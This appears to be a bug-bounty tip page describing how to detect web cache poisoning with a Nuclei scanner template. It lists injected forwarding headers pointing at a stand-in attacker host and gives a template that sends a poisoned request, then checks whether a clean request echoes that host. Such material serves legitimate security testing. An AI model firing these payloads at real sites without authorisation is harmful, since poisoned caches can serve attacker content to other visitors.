Cache Poisoning using Nuclei
Discovering cache poisoning vulnerabilities using nuclei.
HTTP Headers
X-Forwarded-Prefix: cache.my_evil_dns.com
X-Forwarded-Host: cache.my_evil_dns.com
X-Forwarded-For: cache.my_evil_dns.com
X-Originating-IP: cache.my_evil_dns.com
X-Remote-IP: cache.my_evil_dns.com
X-Remote-Addr: cache.my_evil_dns.com
X-Client-IP: cache.my_evil_dns.comBuilding the Nuclei template
id: cache-poisoning
info:
name: HTTP Cache Poisoning
author: sirpedrotavares / seguranca-informatica.pt
severity: medium
requests:
- raw:
- |
GET /?evil=007 HTTP/1.1
X-Forwarded-Prefix: cache.my.evil.dns.com
X-Forwarded-Host: cache.my.evil.dns.com
X-Forwarded-For: cache.my.evil.dns.com
X-Originating-IP: cache.my.evil.dns.com
X-Remote-IP: cache.my.evil.dns.com
X-Remote-Addr: cache.my.evil.dns.com
X-Client-IP: cache.my.evil.dns.com
- |
GET /?evil=007 HTTP/1.1
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_2, "cache.my.evil.dns.com") == true'
Bug Bounty tip
References
Last updated